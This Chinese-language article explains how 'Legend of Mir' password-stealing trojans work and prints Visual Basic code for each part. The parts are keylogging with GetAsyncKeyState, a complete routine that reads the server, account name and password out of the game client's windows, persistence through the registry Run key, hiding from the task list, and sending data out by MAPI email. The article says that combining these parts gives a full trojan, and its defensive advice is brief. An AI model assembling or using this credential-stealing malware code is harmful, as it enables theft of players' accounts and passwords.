自从韩国的网络游戏传奇于2002年十月进入我国后,在国内日渐风靡,游戏玩家逐日增多,与此同时也出现了一些被称为传奇木马的恶意软件,比如:传奇异度灵盗,传奇黑眼等等。这类软件虽然工作方式有所不同,但都被设计的具有窃取游戏帐号和密码的功能。广大玩家深受其害。所谓"知已知彼,百战百胜"。为了能更好的认识并防范这类软件,本文将从编程的角度揭示其工作原理及相应的应付手段。
首先来说一下键盘记录型的传奇木马。这类软件与一般的键盘记录软件大同小异,只是在进行键盘记录之前,先使用一个名为FindWindow的API函数判断传奇是否在运行,如果是的话,启动键盘记录功能,否则不动作。
FindWindow的VB声名如下:
Private Declare Function FindWindowLib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long |
它可以用来返回符合指定类名(lpClassName)或窗口名(lpWindowsName)的窗口句柄。实现键盘记录这个功能时,大多数人想到的应该是使用钩子技术,HOOK用户的击键行为。
其实除此之外,还有一API函数,同样可以轻松进行键盘记录:GetAsyncKeyState,这个函数根据虚拟键表判断按键类型。返回值为一个16位的二进制数,如果被按下则最高位为1,即返回-32767,声名如下:
Private Declare Function GetAsyncKeyState Lib "user32" Alias"GetAsyncKeyState" (ByVal vKey As Long) As Integer |
例程:
dim aKey as integerdim keyResult as stringkeyResult=GetAsyncKeyState(13)if keyResult=-32767 thenaKey="Enter"endif |
这类击键记录型传奇木马虽然能丝毫不差的记录传奇玩家在游戏中的所有击键行为,但往往需要对庞大的记录文件进行仔细分析才可能找到帐号和密码,非常费时费力。而对付这种软件的方法也非常简单:输入游戏ID和密码时,先随意输入200个字符,然后再清空输入框,输入你的正确信息,这样即使有人得到了你的击键记录文件,不用但心!二三年内他还找不到你的正确ID和密码!
另一种传奇木马的工作原理与上述完全不同,其核心是使用了一个功能强大的SendMessage函数,在其它API函数的配合下,直接抓取玩家输入的游戏帐号和密码!相关函数声名如下:
2 3 4 5 6 7 | Private Declare Function FindWindowEx Lib "user32" Alias"FindWindowExA" ( ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long Private Declare Function SendMessage Lib "user32" Alias"SendMessageA" ( ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long Private Const WM_GETTEXT = &HDPrivate Const WM_GETTEXTLENGTH =&HEPrivate Const GW_HWNDNEXT = 2 |
下面给出一段代码,演示如何抓取传奇所在服务器,游戏帐号,密码:
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 | Dim tex As String, tex2 As String, tex5As String, tex6 As String Private Sub Form_Load() TexServer.Text = "" TexPass.Text = "" TexUser.Text = "" End Sub Private Sub TimMain_Timer() Dim HwndServer As Long HwndServer = FindWindow(vbNullString, "传奇客户端") If HwndServer <> 0 Then Dim ServerOwner As String, HwndCombo As Long ServerOwner = "TComboBox" HwndCombo = FindWindowEx(HwndServer, 0, ServerOwner, vbNullString) If HwndCombo <> 0 Then Dim SevLength As Long, SevCon As String SevLength = SendMessage(HwndCombo, WM_GETTEXTLENGTH, 0, 0) SevLength = SevLength + 1 SevCon = Space(SevLength)SendMessage HwndCombo, WM_GETTEXT, SevLength, ByVal SevConTexServer.Text = SevCon End IfEnd If Dim HwndMain As Long HwndMain = FindWindow(vbNullString, "legend ofmir2") If HwndMain <> 0 Then Dim PassOwner As String, HwndPass As Long PassOwner = "TEdit" HwndPass = FindWindowEx(HwndMain, 0, PassOwner, vbNullString) If HwndPass <> 0 Then Dim PassLength As Long, PassCon As String PassLength = SendMessage(HwndPass, WM_GETTEXTLENGTH, 0, 0) PassLength = PassLength + 1 PassCon = Space$(PassLength)SendMessage HwndPass, WM_GETTEXT, PassLength, ByVal PassConTexPass.Text = PassConDim HwndUser As Long, UserLength As Long, UserCon As String HwndUser = GetWindow(HwndPass, GW_HWNDNEXT) If HwndUser <> 0 Then UserLength = SendMessage(HwndUser, WM_GETTEXTLENGTH, 0, 0) UserLength = UserLength + 1 UserCon = Space(UserLength)SendMessage HwndUser, WM_GETTEXT, UserLength, ByVal UserConTexUser.Text = UserCon End IfEnd IfEnd IfEnd Sub |
以上代码实现了简单的抓取功能,只能在WinArrayX下运行,WinNT/2000中禁止不同的进程间相互访问数据,需要用到其它API创建一个数据共享才行。对于这类软件的防范,对于一般玩家来说比较难做到。最好的办法是在传奇客户端软件中加入一段程序,当用户输入数据时,判断是否有其它窗体向帐号密码框发送消息,并做相应处理,即对SendMessage进行防范,这种代码在网上有很多,而且能写传奇的韩国程序员想必也非等闲之辈,在下就不搬门弄斧了。以上是对各类传奇木马核心功能的解析,接下来,我们来看它的其它功能。
1,开机自动运行
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | Private Declare Function RegcreateKey Lib "advapi32.dll" Alias"RegcreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegCloseKeyLib "advapi32.dll" (ByVal hKey As Long) As Long Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA"( ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByValdwType As Long, lpData As Any, ByVal cbData As Long) As Long Const REG_SZ = 1Const HKEY_LOCAL_MACHINE =&H80000002FileCopy "test.exe","c:\windows\system\test.exe" Dim ne As String Dim na As String SetMyValue HKEY_LOCAL_MACHINE,"SoftWare\Microsoft\Windows\CurrentVersion\Run", _"wing","c:\windows\system\test.exe" Sub SetMyValue(hKey As Long, strPath As String, strValue As String, strData As String)Dim keyHandle& Dim lResult As Long lResult = RegcreateKey(hKey, strPath,keyHandle&)lResult = RegSetValueEx(keyHandle&,strValue, 0, REG_SZ, ByVal strData, Len(strData))lResult = RegCloseKey(keyHandle&) End Sub |
以上给出一段例程,通过注册表实现开机自动运行。但在下也不能保证每种软件都是通过这种方法来实现的,也可能是Autoexec.bat,winstart.bat,win.ini,甚至是动态加载dll文件。
2,隐藏
这里是指不出现在任务栏列表中,winArrayx中的实现代码如下:
Private Declare Function GetCurrentProcessId Lib "kernel32" ()As Long |
这个函数可以获得当前进程一个唯一的标识符。
Private Declare Function RegisterServiceProcess Lib "kernel32"(ByVal dwProcessID As Long, ByVal dwType As Long) As Long |
这个函数可以将进程 ID 号为dwProcessID的进程注册或取消注册为"服务器"。’所用常量:’这里的常量也就是dwType的值。
2 | Const RSP_SIMPLE_SERVICE = 1 Dim pid As Long, reserv As Long |
获取当前进程
IDpid = GetCurrentProcessId() |
注册为服务器
regserv = RegisterServiceProcess(pid,RSP_SIMPLE_SERVICE) |
最后是自动邮件发送功能,方法有很多种,可以利用VB自带的MAPI控件,API,或是第三方控件。
以MAPI控件单独发送邮件为例:
MAPISession1.signOnwith MAPI Message1.mcgindex=-1.recipdisplayname="test".msgsubject="test2". msgnotetext="test3".sessionID=MAPIsession1.sessionID.sendend with |
将以上各部分代码融合,即具有了一个传奇木马的所有基本功能,本文给出相关代码只是希望各位能更好的了解它的工作原理,做到更好的防范,希望大家善用!
发表评论